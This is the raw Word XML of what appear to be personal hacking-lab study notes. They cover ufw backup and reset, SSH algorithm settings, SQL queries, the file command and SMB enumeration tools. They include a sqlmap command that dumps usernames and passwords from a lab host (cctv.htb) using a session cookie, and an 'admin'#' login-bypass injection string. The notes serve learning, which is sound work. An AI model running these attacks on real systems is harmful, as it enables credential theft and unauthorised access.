      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>HostKeyAlgorithms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> +ssh-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B82BA27" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>PubkeyAcceptedAlgorithms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> +ssh-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="612C5F0E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7E4783B5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Firewall Tables | Saving and resetting firewall using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1894BEFA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">Saving </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F38FD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t># Optional: human-readable snapshot of current rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA1647"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ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> status verbose &gt; ufw-rules-backup.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05658FDE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t># Full config backup (this is what you can restore)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CE49C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>cvzf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-backup-$(date +%F).tar.gz /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34EAE78D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Can be seen in: cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>after.rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32C1CC83" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF9195" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>To flush all rules on table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6910F2B8"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ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --force disable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3C64C5"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ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --force reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2B0F0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3E7A92B9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">To restore all rules on a table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B8B22" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t># 1. Disable UFW before restoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5A5F0"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ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> disable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBDB80" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t># 2. Restore the backed-up config directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250AC51" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>xvzf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> ufw-backup-YYYY-MM-DD.tar.gz -C /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF9223" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t># 3. Ensure safe permissions (recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C64C71"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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -R 600 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="426F4B1D"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chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -R </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42A17CFD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t># 4. Re-enable UFW with restored rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4844CD80" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C8E4E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t># 5. Verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C01E8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> status verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21E444" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="613EED60" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Metadata on pictures and videos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46257290" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Metadata is stored data that is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>automattically</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> collected unless turned off. If sent directly will be stored but if sent through social media or other untested means information will be stripped. will be overwritten with the information from that sites source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8CD5D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Sites such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>EXIF.tools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> or metadata2go.com can view metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DB3476" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="0F787E3E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>sliver-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8FCF2A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="540B5267" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Format for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (Cause I always forget)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51651295" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -u "http://cctv.htb/zm/index.php?view=request&amp;request=event&amp;action=removetag&amp;tid=1" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>zm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -T Users -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Username,Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --dump --batch --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">=MySQL --technique=T --cookie="ZMSESSID=dmml40162naug1ueic2e8lpeso" --time-sec=2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D86BDD0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">-u for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">, -D for database, -T for table, -C for column, --dump for showing outputs, --cookie setup is name=value, --time was for this time based vuln </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CACAE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>BASIC SQL TESTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE95A11" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Username: admin'# Password: $anything (super basic test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C310343" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>HOW TO SEARCH THROUGH SQL DATABASES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F56E6F3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- SHOW DATABASES; (displays all databases in a server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6C84E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- SHOW TABLES;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479F0B83" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- SELECT * FROM ($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Table_Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B897CC1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2483BBA0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>For FILE LANGAUGE WHEN LOOKING AT BINARIES OR COMPILED STUFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1B5D9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>file &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A4608" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2E0D9905" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>This is your #1 tool. It tells you the type instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB40ECF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="48A90BAB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Common outputs you should memorize:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18316B40" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Output contains</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Meaning</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Language clue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEC3EB5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>ELF</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Linux executable</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>C / C++ / Rust / Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E7209" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>PE32 or PE32+</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Windows exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>C / C++ / .NET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D9734C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Python script</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35291502" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>ASCII text</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Plain text</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Could be anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417C4DF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>UTF-8 text</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Check manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE85C01" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Zip archive</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Compressed</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>unzip it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E66A8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Unknown</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Dig deeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50552222" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6D0B49CA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>How to SMB I know 2 specific tools so far</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AC99C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FB54FFF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- the tool format is: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAB9CF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- For Listing all shares: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -L //{IP}/ | -N for No password | -U &amp; -P for User and Pass  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714721AC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- For connecting to a share: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> //{IP}/&lt;share&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E3BDD7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF6D2C5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- This tool format is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700BE76" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- To perform an anonymous scan: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbmap</w:t>
      </w:r>
